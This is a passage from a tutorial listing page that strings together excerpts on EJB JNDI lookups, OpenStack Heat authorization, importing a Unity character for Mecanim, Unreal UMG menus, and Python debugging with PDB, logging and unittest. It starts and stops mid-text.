javax.ejb.Local; import javax.ejb.Stateful; @Stateful @Local public class Student implements StudentLocal { @Override public List<CourseDTO> getCourses() { //get courses are return … } } Clients can access the Student EJB only through the local interface: import javax.ejb.EJB; import javax.faces.bean.ManagedBean; @ManagedBean public class StudentJSFBean { @EJB private StudentLocal student; } The session bean can implement multiple business interfaces. Accessing a session bean using a JNDI lookup Though accessing EJB using dependency injection is the easiest way, it works only if the container manages the class that accesses the EJB. If you want to access EJB from a POJO that is not a managed bean, then dependency injection will not work. Another scenario where dependency injection does not work is when EJB is deployed in a separate JVM (this could be on a remote server). In such cases, you will have to access EJB using a JNDI lookup (visit https://docs.oracle.com/javase/tutorial/jndi/ for more information on JNDI). JEE applications can be packaged in an Enterprise Application Archive (EAR), which contains a .jar file for EJBs and a WAR file for web applications (and the lib folder contains the libraries required for both). If, for example, the name of an EAR file is CourseManagement.ear and the name of an EJB JAR file in it is CourseManagementEJBs.jar, then the name of the application is CourseManagement (the name of the EAR file) and the module name is CourseManagementEJBs. The EJB container uses these names to create a JNDI URL for lookup EJBs. A global JNDI URL for EJB is created as follows: "java:global/<application_name>/<module_name>/<bean_name>![<bean_interface>]" java:global: Indicates that it is a global JNDI URL. <application_name>: The application name is typically the name of the EAR file. <module_name>: This is the name of the EJB JAR. <bean_name>: This is the name of the EJB bean class. <bean_interface>: This is optional if EJB has a no-interface view, or if it implements only one business interface. Otherwise, it is a fully qualified name of a business interface. EJB containers are also required to publish two more variations of JNDI URLs for each EJB. These are not global URLs, which means that they can't be used to access EJBs from clients that are not in the same JEE application (in the same EAR): "java:app/[<module_name>]/<bean_name>![<bean_interface>]" "java:module/<bean_name>![<bean_interface>]" The first URL can be used if the EJB client is in the same application, and the second URL can be used if the client is in the same module (the same JAR file as the EJB). Before you look up any URL in a JNDI server, you need to create an InitialContext that includes information, among other things such as the hostname of JNDI server and the port on which it is running. If you are creating InitialContext in the same server, then there is no need to specify these attributes: InitialContext initCtx = new InitialContext(); Object obj = initCtx.lookup("jndi_url"); We can use the following JNDI URLs to access a no-interface (LocalBean) Student EJB (assuming that the name of the EAR file is CourseManagement and the name of the JAR file for EJBs is CourseManagementEJBs): URL When to use java:global/CourseManagement/ CourseManagementEJBs/Student The client can be anywhere in the EAR file, because we are using a global URL. Note that we haven't specified the interface name because we are assuming that the Student bean provides a no-interface view in this example. java:app/CourseManagementEJBs/Student The client can be anywhere in the EAR. We skipped the application name because the client is expected to be in the same application. This is because the namespace of the URL is java:app. java:module/Student The client must be in the same JAR file as EJB. We can use the following JNDI URLs to access the Student EJB that implemented a local interface, StudentLocal: URL When to use java:global/CourseManagement/ CourseManagementEJBs/Student!packt.jee.book.ch6.StudentLocal The client can be anywhere in the EAR file, because we are using a global URL. java:global/CourseManagement/ CourseManagementEJBs/Student The client can be anywhere in the EAR. We skipped the interface name because the bean implements only one business interface. Note that the object returned from this call will be of the StudentLocal type, and not Student. java:app/CourseManagementEJBs/Student Or java:app/CourseManagementEJBs/Student!packt.jee.book.ch6.StudentLocal   The client can be anywhere in the EAR. We skipped the application name because the JNDI namespace is java:app. java:module/Student Or java:module/Student!packt.jee.book.ch6.StudentLocal The client must be in the same EAR as the EJB. Here is an example of how we can call the Student bean with the local business interface from one of the objects (that is not managed by the web container) in our web application: InitialContext ctx = new InitialContext(); StudentLocal student = (StudentLocal) ctx.loopup ("java:app/CourseManagementEJBs/Student"); return student.getCourses(id) ; //get courses from Student EJB Creating EAR for Deployment outside Eclipse. Summary EJBs are ideal for writing business logic in web applications. They can act as the perfect bridge between web interface components, such as a JSF, servlet, or JSP, and data access objects, such as JDO. EJBs can be distributed across multiple JEE application servers (this could improve application scalability) and their life cycle is managed by the container. EJBs can easily be injected into managed objects or can be looked up using JNDI. The Eclipse JEE makes creating and consuming EJBs very easy. The JEE application server Glassfish can also be managed and applications can be deployed from within Eclipse. Resources for Article: Further resources on this subject: Contexts and Dependency Injection in NetBeans[article] WebSockets in Wildfly[article] Creating Java EE Applications [article]
Read more
  • 0
  • 0
  • 16346

article-image-orchestration-service-openstack
Packt
24 Sep 2015
6 min read
Save for later

The orchestration service for OpenStack

Packt
24 Sep 2015
6 min read
This article by Adnan Ahmed, the author of the book, OpenStack Orchestration, will discuss the orchestration service for OpenStack. (For more resources related to this topic, see here.) Orchestration is a main feature provided and supported by OpenStack. It is used to orchestrate cloud resources, including applications, disk resources, IP addresses, load balancers, and so on. Heat contains a template engine that supports text files, where cloud resources are defined. These text files are defined in a special format compatible with Amazon CloudFormation. A new OpenStack native standard has also been developed for providing templates for orchestration called HOT (Heat Orchestration Template). Heat provides two types of clients; namely, a command-line client and a web-based client integrated into OpenStack dashboard. The orchestration project (Heat) itself is composed of several subcomponents. These subcomponents are listed as follows: Heat Heat engine Heat API Heat API-CFN Heat uses the term stack to define a group of services, resources, parameters inputs, constraints, and dependencies. A stack can be defined using a text file; however, the important point is to use the correct format. The JASON format used by AWS Cloud Formation is also supported by Heat. Heat workflow Heat provides two types of interfaces, including a web-based interface integrated into the OpenStack dashboard, and also a command-line interface (CLI), which can be used from inside a Linux shell. The interfaces use the Heat API to send commands to the Heat engine via the messaging service (for example, Rabbit MQ). A metering service such as the Ceilometer or CloudWatch API is used to monitor the performance of resources in the stack. These monitoring/metering services are used to trigger actions upon reaching a certain threshold. An example of this could be automatically launching a redundant web server behind a load balancer when the CPU load on the primary web server reaches above 90 percent. The orchestration authorization model The Heat component of OpenStack uses an authorization model composed of mainly two types: Password-based authorization Authorization-based on OpenStack identity trusts This process is known as orchestration authorization. Password authorization In this type of authorization, a password is expected from the user. This password must match with the password stored in a database by the Heat engine in an encrypted form. The following are the steps used to generate a username/password: A request is made to the Heat engine for a token or an authorization password. Normally, the Heat command-line client or the dashboard is used. The validation checks will fail if the stack contains any resources under deferred operations. If everything is normal, then a username/password is provided. The username/password are stored in the database in encrypted form. In some cases, the Heat engine, after obtaining the credentials, requests another token on the user's behalf, and thereafter, access to all the roles of stack owner are provided. Keystone trusts authorization Keystone trusts are extensions to the OpenStack identity service that are used for enabling delegation of resources. The trustor and the trustee are the two delegates used in this method. The trustor is the user who delegates and the trustee is the user who is being delegated. The following information from the trustor is required by the identity service to delegate a trustee: The ID of the trustee (the user to be delegated, in the case of Heat, it will be the Heat user) The roles to be delegated (The roles are configured using the Heat configuration file. For example, to launch a new instance to achieve auto-scaling in the case of reaching a threshold) Trusts authorization execution The creating a Stack via an API request step can be followed to execute a trust-based authorization. A token is used to create a trust between the stack owner (the trustor) and the Heat service user (also known as trustee in this case). A special role is delegated. This role must be predefined in the trusts_delegated-roles list inside the heat.conf file. By default, all the available roles for trustor are set to be available for the trustee if it is not modified using a local RBAC policy. This trust ID is stored in an encrypted form in the database. This trust ID is retrieved from the database when an operation is required. Authorization model configuration Heat used to support the password-based authorization until the Kilo version of OpenStack was released. Using the kilo version of OpenStack, the following changes can be made to enable trusts-based authorization in the Heat configuration file: Default setting in heat.conf: deferred_auth_method=password To be replaced to enable trusts-based authentication: deferred_auth_method=trusts The following parameter need to be set to specify trustor roles: trusts_delegated_roles = As mentioned earlier, all available roles for trustor will be assigned to the trustee if no specific roles are mentioned in the heat.conf file. Stack domain users The Heat stack domain user is used to authorize a user to carry out certain operations inside a virtual machine. Agents running inside virtual machine instances are provided with metadata. These agents repot and share the performance statistics of the VM on which they are running. They use this metadata to apply any changes or some sort of configuration expressed in the metadata. A signal is passed to the Heat engine when an event is completed successfully or with failed status. A typical example could be to generate an alert when the installation of an application is completed on a specific virtual machine after its first reboot. Heat provides features for encapsulating all the stack-defined users into a separate domain. This domain is usually created to store the information related to the Heat service. A domain admin is created, which is used by Heat for the management of the stack-domain users. Summary In this article, we learned that Heat is the orchestration service for OpenStack. We learned about the Heat authorization models, including password authorization, keystone trust authorization, and how these models work. For more information on OpenStack, you can visit: https://www.packtpub.com/virtualization-and-cloud/mastering-openstack https://www.packtpub.com/virtualization-and-cloud/openstack-essentials Resources for Article: Further resources on this subject: Using OpenStack Swift[article] Installing OpenStack Swift [article] Securing OpenStack Networking [article]
Read more
  • 0
  • 0
  • 1967

article-image-zombie-attacks
Packt
24 Sep 2015
9 min read
Save for later

The Zombie Attacks!

Packt
24 Sep 2015
9 min read
 In this article by Jamie Dean author of the book Unity Character Animation with Mecanim: RAW, we will demonstrate the process of importing and animating a rigged character in Unity. In this article, we will cover: Starting a blank Unity project and importing the necessary packages Importing a rigged character model in the FBX format and adjusting import settings Typically, an enemy character such as this will have a series of different animation sequences, which will be imported separately or together from a 3D package. In this case, our animation sequences are included in separate files. We will begin, by creating the Unity project. (For more resources related to this topic, see here.) Setting up the project Before we start exploring the animation workflow with Mecanim's tools, we need to set up the Unity project: Create a new project within Unity by navigating to File | New Project.... When prompted, choose an appropriate name and location for the project. In the Unity - Project Wizard dialog that appears, check the relevant boxes for the Character Controller.unityPackage and Scripts.unityPackage packages. Click on the Create button. It may take a few minutes for Unity to initialize. When the Unity interface appears, import the PACKT_cawm package by navigating to Assets | Import Package | Custom Package.... The Import package... window will appear. Navigate to the location where you unzipped the project files, select the unity package, and click on Open.The assets package will take a little time to decompress. When the Importing Package checklist appears, click on the Import button in the bottom-right of the window. Once the assets have finished importing, you will start with a default blank scene. Importing our enemy Now, it is time to import our character model: Minimize Unity. Navigate to the location where you unzipped the project files. Double-click on the Models folder to view its contents. Double-click on the zombie_m subfolder to view its contents.The folder contains an FBX file containing the rigged male zombie model and a separate subfolder containing the associated textures. Open Unity and resize the window so that both Unity and the zombie_m folder contents are visible. In Unity, click on the Assets folder in the Project panel. Drag the zombie_m FBX asset into the Assets panel to import it.Because the FBX file contains a normal map, a window will pop up asking if you want to set this file's import settings to read it correctly. Click on the Fix Now button. FBX files can contain embedded bitmap textures, which can be imported with the model. This will create subfolders containing the materials and textures within the folder where the model has been imported. Leaving the materials and textures as subfolders of the model will make them difficult to find within the project. The zombie model and two folders should now be visible in the FBX_Imports folder in the Assets panel. In the next step, we will move the imported material and texture assets into the appropriate folders in the Unity project. Organizing the material and textures The material and textures associated with the zombie_m model are currently located within the FBX_Imports folder. We will move these into different folders to organize them within the hierarchy of our project: Double-click on the Materials folder and drag the material asset contained within it into the PACKT_Materials folder in the Project panel. Return to the FBX_Imports folder by clicking on its title at the top of the Assets panel interface. Double-click on the textures folder. This will be named to be consistent with the model. Drag the two bitmap textures into the PACKT_Textures folder in the Project panel. Return to the FBX_Imports folder and delete the two empty subfolders.The moved material and textures will still be linked to the model. We will make sure of this by instancing it in the current empty scene. Drag the zombie_m asset into the Hierarchy panel. It may not be immediately visible within the Scene view due to the default import scale settings. We will take care of this in the next step. Adjusting the import scale Unity's import settings can be adjusted to account for the different tools commonly used to create 2D and 3D assets. Import settings are adjusted in the Inspector panel, which will appear on the right of the unity interface by default: Click on the zombie_m game object within the Hierarchy panel.This will bring up the file's import settings in the Inspector panel. Click on the Model tab. In the Scale Factor field, highlight the current number and type 1. The character model has been modeled to scale in meters to make it compatible with Unity's units. All 3D software applications have their own native scale. Unity does a pretty good job at accommodating all of them, but it often helps to know which software was used to create them. Scroll down until the Materials settings are visible. Uncheck the Import Materials checkbox.Now that we have got our textures and materials organized within the project, we want to make sure they are not continuously imported into the same folder as the model. Leave the remaining Model Import settings at their default values.We will be discussing these later on in the article, when we demonstrate the animation import. Click on the Apply button. You may need to scroll down within the Inspector panel to see this: The zombie_m character should now be visible in the Scene view: This character model is a medium resolution model—4410 triangles—and has a single 1024 x 1024 albedo texture and separate 1024 x 1024 specular and normal maps. The character has been rigged with a basic skeleton. The rigging process is essential if the model is to be animated. We need to save our progress, before we get any further: Save the scene by navigating to File | Save Scene as.... Choose an appropriate filename for the scene. Click on the Apply button. Despite the fact that we have only added a single game object to the default scene, there are more steps that we will need to take to set up the character and it will be convenient for us to save the current set up in case anything goes wrong. In the character animation, there are looping and single-shot animation sequences. Some animation sequences such as walk, run, idle are usually seamless loops designed to play back-to-back without the player being aware of where they start and end. Other sequences, typically, shooting, hitting, being injured or dying are often single-shot animations, which do not need to loop. We will start with this kind, and discuss looping animation sequences later in the article. In order to use Mecanim's animation tools, we need to set up the character's Avatar so that the character's hierarchy of bones is recognized and can be used correctly within Unity. Adjusting the rig import settings and creating the Avatar Now that we have imported the model, we will need to adjust the import settings so that the character functions correctly within our scene: Select zombie_m in the Assets panel. The asset's import settings should become visible within the Inspector panel. This settings rollout contains three tabs: Model, Rig, and Animations. Since we have already adjusted the Scale Factor within the Model Import settings, we will move on to the Rig import settings where we can define what kind of skeleton our character has. Choosing the appropriate rig import settings Mecanim has three options for importing rigged models: Legacy, Generic, and Humanoid. It also has a none option that should be applied to models that are not intended to be animated. Legacy format was previously the only option for importing skeletal animation in Unity. It is not possible to retarget animation sequences between models using Legacy, and setting up functioning state machines requires quite a bit of scripting. It is still a useful tool for importing models with fewer animation sequences and for simple mechanical animations. Legacy format animations are not compatible with Mecanim. Generic is one of the new animation formats that are compatible with Mecanim's animator controllers. It does not have the full functionality of Mecanim's character animation tools. Animations sequences imported with the generic format cannot be retargeted and are best used for quadrupeds, mechanical devices, pretty much anything except a character with two arms and two legs. The Humanoid animation type allows the full use of Mecanim's powerful toolset. It requires a minimum of 15 bones, and assumes that your rig is roughly human shaped with a pair of arms and legs. It can accommodate many more intermediary joints and some basic facial animation. One of the greatest benefits of using the Humanoid type is that it allows animation sequences to be retargeted or adapted to work with different rigs. For instance, you may have a detailed player character model with a full skeletal rig (including fingers and toes joints), maybe you want to reuse this character's idle sequence with a background character that is much less detailed, and has a simpler arrangement of bones. Mecanim makes it possible reuse purpose built motion sequences and even create useable sequences from motion capture data. Now that we have introduced these three rig types, we need to choose the appropriate setting for our imported zombie character, which in this case is Humanoid: In the Inspector panel, click on the Rig tab. Set the Animation Type field to Humanoid to suit our character skeleton type. Leave Avatar Definition set to Create From This Model. Optimize Game Objects can be left checked. Click on the Apply button to save the settings and transfer all of the changes that you have made to the instance in the scene.  The Humanoid animation type is the only one that supports retargeting. So if you are importing animations that are not unique and will be used for multiple characters, it is a good idea to use this setting. Summary In this article, we covered the major steps involved in animating a premade character using the Mecanim system in Unity. We started with FBX import settings for the model and the rig. We covered the creation of the Avatar by defining the bones in the Avatar Definition settings. Resources for Article: Further resources on this subject: Adding Animations[article] 2D Twin-stick Shooter[article] Skinning a character [article]
Read more
  • 0
  • 0
  • 25732
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-user-interface
Packt
23 Sep 2015
10 min read
Save for later

User Interface

Packt
23 Sep 2015
10 min read
This article, written by John Doran, the author of the Unreal Engine Game Development Cookbook, covers the following recipes: Creating a main menu Animating a menu (For more resources related to this topic, see here.) In order to create a good game project, you need to be able to communicate information to the player. To do this, we need to create a user interface (UI), which will allow us to display information such as the player's health, inventory, and so on. Inside Unreal 4, we use the Slate UI framework to create user interfaces, however, it's a very complex system. To make things easier for end users, Unreal also released the Unreal Motion Graphics (UMG) UI Designer which is a visual UI authoring tool with a much easier workflow. This is what we will be using in this article. For more information on Slate, refer to https://docs.unrealengine.com/latest/INT/Programming/Slate/index.html. Creating a main menu A main menu can serve as an introduction to your game and is a great place for us to discuss some additional things that UMG has, such as Texts and Buttons. We'll also learn how we can make buttons do things. Let's spend some time to see just how easy it is to create one! For more information on the client-server model, refer to https://en.wikipedia.org/wiki/Client%E2%80%93server_model. How to do it… To give you an idea of how it works, let's take a simple example of a coin collectable: Create a new level by going to File | New Level and select Empty Level. Next, inside the Content Browser tab, go to our UI folder, then to Add New | User Interface | Widget Blueprint, and give it a name of MainMenu. Double-click on it to open the editor. In this menu, we are going to have the title of the game and then a series of buttons the player can press: From the Palette tab, open up the Common section and drag and drop a Button onto the middle of the screen. Select the button and change its Size X to 400 and Size Y to 80. We will also rename the button to Play Game. Drag and drop a Text object onto the Play Game button and you should see it snap on to the button as a child. Under Content, change Text to Play Game. From here under Appearance, change the color of the button to black and change the Font size to 32. From the Hierarchy tab, select the Play Game button and copy and paste it to create duplicate. Move the button down, rename it to Quit Game, and change the Text to Content as well. Move both of the objects so that they're on the bottom part of the HUD, slightly above and side by side, as shown in the following image: Lastly, we'll want to set our pivots and anchors accordingly. When you select either the Quit Game or Play Game buttons, you may notice a sun-like looking widget that displays the Anchors of the object (known as the Anchor Medallion). In our case, open Anchors from the Details panel and click on the bottom-center option. Now that we have the buttons created, we want them to actually do something when we click on them. Select the Play Game button and from the Details tab, scroll down until you see the Events component. There should be a series of big green + buttons. Click on the green button beside OnClicked. Next, it will take us to the Event Graph with the appropriate event created for us. To the right of the event, right-click and create an Open Level action. Under Level Name, put in whatever level you like (for example, StarterMap) and then connect the output of the OnClicked action to the input of the Open Level action. To the right of that, create a Remove from Parent action to make sure that when we leave that, the menu doesn't stay. Finally, create a Get Player Controller action and to the right of it a Set Show Mouse Cursor action, which should be disabled, so that the mouse will no longer be visible since we will want to see the mouse in the menu. (Drag Return Value from the Get Player Controller action to create a new node and search for the mouse cursor action.) Now, go back to the Designer button and then select the Quit Game button. Click on the OnClicked button as well and to the right of this one, create a Quit Game action and connect the output of the OnClicked action to the input of the Quit Game action. Lastly, as a bit of polish, let's add our game's title to the screen. Drag and drop another Text object onto the scene, this time with Anchor at the top-center. From here, change Position X to 0 and Position Y to 176. Change Alignment in the X axis to .5 and check the Size to Content option for it to automatically resize. Set the Content component's Text property to the game's name (in my case, Game Name). Under the Appearance component, set the Font size to 93 and set Justification to Center. There are a number of other styling options that you may wish to use when developing your HUDs. For more information about it, refer to https://docs.unrealengine.com/latest/INT/Engine/UMG/UserGuide/Styling/index.html. Compile the menu, and saveit. Now we need to actually have the widget show up. To do so, we'll need to take the same steps as we did earlier. Open up Level Blueprint by going to Blueprints | Open Level Blueprint and create an EventBeginPlay event. Then, to the right of this, right-click and create a Create Widget action. From the dropdown under Class, select MainMenu and connect the arrow from Event Begin Play to the input of Create MainMenu_C Widget. After this, click and drag the output arrow and create an Add to Viewport event. Then, connect Return Value of our Create Widget action to Target of the Add to Viewport action. Now lastly, we also want to display the player's cursor on the screen to show buttons. To do this, right-click and select Get Player Controller. Then, from Return Value of that, create a Show Mouse Cursor object in Set. Connect the output of the Add to Viewport action to the input of the Show Mouse Cursor action. Compile, save, and run the project! With this, our menu is completed! We can quit the game without any problem, and pressing the Play Game button will start our level! Animating a menu You may have created a menu or UI element at some point, but rather than having it static and non-moving, let's spend some time looking at how we can animate the menus by having them fly in and out or animating them in some way. This will help add to the polish of the title as well as enable players to notice things easier as they move in. Getting ready Before we start working on this, we need to have a project created and set up. Do the previous recipe all the way to completion. How to do it… Open up the MainMenu blueprint once more and from the bottom-left in the Animations tab, click on the +Animation button and give the new animation a name of MenuFlyIn. Select the newly created animation and you should see the window on the right-hand side brighten up. Next, click on the Auto Key toggle to have the animation editor automatically set keys that are appropriate for our implementation. If it's not there already, move the timeline bar (the white line with two orange ends on the top and bottom) to the 0.00 mark on the animation timeline. Next, select the Game Name object and under Color and Opacity, open it and change the A (alpha) value to 0. Now move the timeline bar to the 1.00 mark and then open the color again and set the A value to 1. You'll notice a transition—going from a completely transparent text to a fully shown one. This is a good start. Let's have the buttons fly in after the text appears. Next, move the Time bar to the 2.00 mark and select the Play Game button. Now from the Details tab, you'll notice that under the variables, there are new + icons to the left of variables. This value will save the value for use in the animations. Click on the + icon by the Position Y value. If you use your scroll wheel while inside the dark grey portion of the timeline bar (where the keyframe numbers are displayed), it zooms in and out. This can be quite useful when you create more complex animations. Now move the Time bar to the 1.00 mark and move the Play Game button off the screen. By doing the animation in this way, we are saving where we want it to be first at the end, and then going back in time to do the animations. Do the same animation for the Quit Game button. Now that our animation is created, let's make it in a way so that when the object starts, this animation is played. Click on the Graph button and from the MyBlueprint tab under the Graphs section, double-click on the Event Construct event, which is called as soon as we add the menu to the scene. Grab the pin on the end of it and create a Play Animation action. Drag and drop a MenuFlyIn animation into the scene and select Get. Connect its output pin to the In Animation property of the Play Animation action. Now that we have the animation work when we create the menu, let's have it play when we leave the menu. Select the Play Animation and Menu Fly In variables and copy them. Then move to the OnClicked (Play Game) action. Drag the OnClicked event over to the left and remove its original connection to the Open Level action by holding down Alt and clicking. Now paste (Ctrl + V) the new objects and connect the out pin of OnClicked (Play Game) to the input of Play Animation. Now change Play Mode to Reverse. To the right of this, create a Delay action. For the Duration variable, we want it to wait as long as the animation is, so from the Menu Fly In variable, create another pin and create a Get End Time action. Connect Return Value of Get End Time to the input of the Delay action. Connect the output of the Play Animation action to the input of the Delay action and the Completed output of the Delay action to the input of the Open Level action. Now we need to do the same for the OnClicked (Quit Game) event. Now compile, save, and run the game! Our menu is now completed and we've learned about how animation works inside UMG! For more examples of using UMG for animation, refer to https://docs.unrealengine.com/latest/INT/Engine/UMG/UserGuide/Animation/index.html. Summary This article gave you some insight on Slate and the UMG Editor to create a number of UI elements and an animated main menu to tie your whole game together. We created a main menu and also learned how to make buttons do things. We spent some time looking at how we can animate menus by having them fly in and out. Resources for Article: Further resources on this subject: The Blueprint Class[article] Adding Fog to Your Games [article] Overview of Unreal Engine 4 [article]
Read more
  • 0
  • 0
  • 11570

article-image-debugging-applications-pdb-and-log-files
Packt
23 Sep 2015
13 min read
Save for later

Debugging Applications with PDB and Log Files

Packt
23 Sep 2015
13 min read
 In this article by Dan Nixon of the book Getting Started with Python and Raspberry Pi, we will learn more about how to debug Python code using the Python Debugger (PDB) tool and how we can use the Python logging framework to make complex applications written in Python easier to debug when they fail. (For more resources related to this topic, see here.) We will also look at the technique of unit testing and how the unittest Python module can be used to test small sections of a Python application to ensure that it is functioning as expected. These techniques are commonly used in applications written in other languages and are good skills to learn if you are often going to be developing applications. The Python debugger PDB is a tool that allows real time debugging of running Python code. It can help to track down issues with the logic of a program to help find the cause of a crash or unexpected behavior. PDB can be launched with the following command: pdb2.7 do_calculaton.py This will open a new PDB shell, as shown in the following screenshot: We can use the continue command (which can be shortened to c) to execute the next section of the code until a breakpoint is hit. As we are yet to declare any breakpoints, this will run the script until it exits normally, as shown in the following screenshot: We can set breakpoints in the application, where the program will be stopped, and you will be taken back to the PDB shell in order to debug the control flow of the program. The easiest way to set a breakpoint is by giving a specific line in a file, for example: break Operation.py:7 This command will add a breakpoint on line 7 of Operation.py. When this is added, PDB will confirm the file and the line number, as shown in the following screenshot: Now, when we run the application, we will see the program stop each time the breakpoint is reached. When a breakpoint is reached, we can resume the program using the c command: When paused at a breakpoint, we can view the details of the local variables in the current scope. For example, in the breakpoint we have added, there is a variable named name, which we can see the value of by using the following command: p name This outputs the value of the variable, as shown in the following screenshot: When at a breakpoint, we can also get a stack trace of the functions that have been called so far. This is done using the bt command and gives output like that shown in the following screenshot: We can also modify the values of the variables when paused at a breakpoint. To do this, simply assign a value to the variable name as you would in a regular Python script: name = 'subtract' In the following screenshot, this was used to change the first operation in the do_calculation.py script from add to subtract; the effect on the calculation is seen in the different result value: When at a breakpoint, we can also use the l command to see the current line the program is paused at. An example of this is shown in the following screenshot: We can also setup a series of commands to be executed when we hit a breakpoint. This can allow debugging to be automated to an extent by automatically recording or modifying the values of the variables at certain points in the program's execution. This can be demonstrated using the following commands on a new instance of PDB with no breakpoints set (first, quit PDB using the q command, and then re-launch it): break Operation.py:7 commands p name c This gives the following output. Note that the commands are entered on a terminal prefixed (com) rather than the PDB terminal prefixed (pdb). This set of commands tells PDB to print the value of the name variable and continue execution when the last added breakpoint was hit. This gives the output shown in the following screenshot: Within PDB, you can also use the ? command to get a full list of the available commands and help on using them, as shown in the following screenshot: Further information and full documentation on PDB is available at https://docs.python.org/2/library/pdb.html. Writing log files The next technique we will look at is having our application output a log file. This allows us to get a better understanding of what was happening at the time an application failed, which can provide key information into finding the cause of the failure, especially when the failure is being reported by a user of your application. We will add some logging statements to the Calculator.py and Operation.py files. To do this, we must first add the import for the logging module (https://docs.python.org/2/library/logging.html) to the start of each python file, which is simply: import logging In the Operation.py file, we will add two logging calls in the evaluate function, as shown in the following code: def evaluate(self, a, b): logging.getLogger(__name__).info("Evaluating operation: %s" % (self._operation)) logging.getLogger(__name__).debug("RHS: %f, LHS: %f" % (a, b)) This will output two logging statements: one at the debug level and one at the information level. There are in total five unique levels at which messages can be output. In increasing severity, they are: debug() info() warning() error() critical() Log handlers can be filtered to only process the log messages of a certain severity if required. We will see this in action later in this section. The logging.getLogger(__name__) call is used to retrieve the Logger class for the current module (where the name of the module is given by the __name__ variable). By default, each module uses its own Logger class identified by the name of the module. Next, we can add some debugging statements to the Calculator.py file in the same way. Here, we will add logging to the enter_value, enter_operation, evaluate, and all_clear functions, as shown in the following code snippet: def enter_value(self, value): if len(self._input_list) > 0 and not isinstance(self._input_list[-1], Operation): raise RuntimeError("Must enter an operation next") logging.getLogger(__name__).info("Adding value: %f" % (value)) self._input_list.append(float(value)) def enter_operation(self, operation_name): if len(self._input_list) == 0 or isinstance(self._input_list[-1], Operation): raise RuntimeError("Must enter a value next") logging.getLogger(__name__).info("Adding operation: %s" % (operation_name)) self._input_list.append(Operation(operation_name)) def evaluate(self): logging.getLogger(__name__).info("Evaluating calculation") if len(self._input_list) % 2 == 0: raise RuntimeError("Input length mismatch") self._result = self._input_list[0] for idx in range(1, len(self._input_list), 2): operation = self._input_list[idx] next_value = self._input_list[idx + 1] logging.getLogger(__name__).debug("Next function: %f %s %f" % ( self._result, str(operation), next_value)) self._result = operation.evaluate(self._result, next_value) logging.getLogger(__name__).info("Result is: %f" % (self._result)) return self._result def all_clear(self): logging.getLogger(__name__).info("Clearing calculator") self._input_list = [] self._result = 0.0 Finally, we need to configure a handler for the log messages. This is what will handle the messages sent by each logger and output them to a suitable destination; for example, the standard output or a file. We will configure this in the do_conversion.py file. First, we will configure a basic handler that will print all the log messages to the standard output so that they appear on the terminal. This can be achieved with the following code: logging.basicConfig(level=logging.DEBUG) We will also add the following line to the end of the script. This is used to close any open log handlers and should be included at the very end of an application (the logging framework should not be used after calling this function). logging.shutdown() Now, we can see the effects by running the script using the following command: python do_calculation.py This will give an output to the terminal, as shown in the following screenshot: We can also have the log output written to a file instead of printed to the terminal by adding a filename to the logger configuration. This helps to keep the terminal free of unnecessary information. logging.basicConfig(level=logging.DEBUG, filename='calc.log') When executed, this will give no additional output other than the result of the calculation, but will have created an additional file, calc.log, which contains the log messages, as shown in the following screenshot: Unit testing Unit testing is a technique for automated testing of small sections ("units") of code to ensure that the components of a larger application are working as intended, independently of each other. There are many frameworks for this in almost every language. In Python, we will be using the unittest module, as this is included with the language and is the most common framework used in the Python applications. To add unit tests to our calculator module, we will create an additional module in the same directory named test. Inside that will be three files: __init__.py (used to denote that a directory is a Python package), test_Calculator.py, and test_Operation.py. After creating this additional module, the structure of the code will be the same as shown in the following image: Next, we will modify the test_Operation.py file to include a test case for the Operation class. As always, this will start with the required imports for the modules we will be using: import unittest from calculator.Operation import Operation We will be creating a class, test_Operation, which inherits from the TestCase class provided by the unittest module. This contains the logic required to run the functions of the class as individual unit tests. class test_Operation(unittest.TestCase): Now, we will define four tests to test the creation of a new Operation instance for each of the operations that are supported by the class. Here, the assertEquals function is used to test for equality between two variables; this determines if the test passes or not. def test_create_add(self): op = Operation('add') self.assertEqual(str(op), 'add') def test_create_subtract(self): op = Operation('subtract') self.assertEqual(str(op), 'subtract') def test_create_multiply(self): op = Operation('multiply') self.assertEqual(str(op), 'multiply') def test_create_divide(self): op = Operation('divide') self.assertEqual(str(op), 'divide') In this test we are checking that a RuntimeError is raised when an unknown operation is given to the Operation constructor. We will do this using the assertRaises function. def test_create_fails(self): self.assertRaises(ValueError, Operation, 'not_a_function') Next, we will create four tests to ensure that each of the known operations evaluates to the correct result: def test_add(self): op = Operation('add') result = op.evaluate(5, 2) self.assertEqual(result, 7) def test_subtract(self): op = Operation('subtract') result = op.evaluate(5, 2) self.assertEqual(result, 3) def test_multiply(self): op = Operation('multiply') result = op.evaluate(5, 2) self.assertEqual(result, 10) def test_divide(self): op = Operation('divide') result = op.evaluate(5, 2) self.assertEqual(result, 2) This will form the test case for the Operation class. Typically, the test file for a module should have the name of the module prefixed by test, and the name of each test function within a test case class should start with test. Next, we will create a test case for the Calculator class in the test_Calculator.py file. This again starts by importing the required modules and defining the class: import unittest from calculator.Calculator import Calculator class test_Operation(unittest.TestCase): We will now add two test cases that test the correct handling of errors when operations and values are entered in the incorrect order. This time, we will use the assertRaises function to create a context to test for RuntimeError being raised. In this case, the error must be raised by any of the code within the context. def test_add_value_out_of_order_fails(self): with self.assertRaises(RuntimeError): calc = Calculator() calc.enter_value(5) calc.enter_value(5) calc.evaluate() def test_add_operation_out_of_order_fails(self): with self.assertRaises(RuntimeError): calc = Calculator() calc.enter_operation('add') calc.evaluate() This test is to ensure that the all_clear function works as expected. Note that, here, we have multiple test assertions in the function, and all assertions have to pass for the test to pass. def test_all_clear(self): calc = Calculator() calc.enter_value(5) calc.evaluate() self.assertEqual(calc.get_result(), 5) calc.all_clear() self.assertEqual(calc.get_result(), 0) This test ensured that the evaluate() function works as expected and checks the output of a known calculation. Note, here, that we are using the assertAlmostEqual function, which ensures that two numerical variables are equal within a given tolerance, in this case 13 decimal places. def test_evaluate(self): calc = Calculator() calc.enter_value(5.0) calc.enter_operation('multiply') calc.enter_value(2.0) calc.enter_operation('divide') calc.enter_value(5.0) calc.enter_operation('add') calc.enter_value(18.0) calc.enter_operation('subtract') calc.enter_value(5.0) self.assertAlmostEqual(calc.evaluate(), 15.0, 13) self.assertAlmostEqual(calc.get_result(), 15.0, 13) These two tests will test that the errors are handled correctly when the evaluate() function is called, when there are values missing from the input or the input is empty: def test_evaluate_failure_empty(self): with self.assertRaises(RuntimeError): calc = Calculator() calc.enter_operation('add') calc.evaluate() def test_evaluate_failure_missing_value(self): with 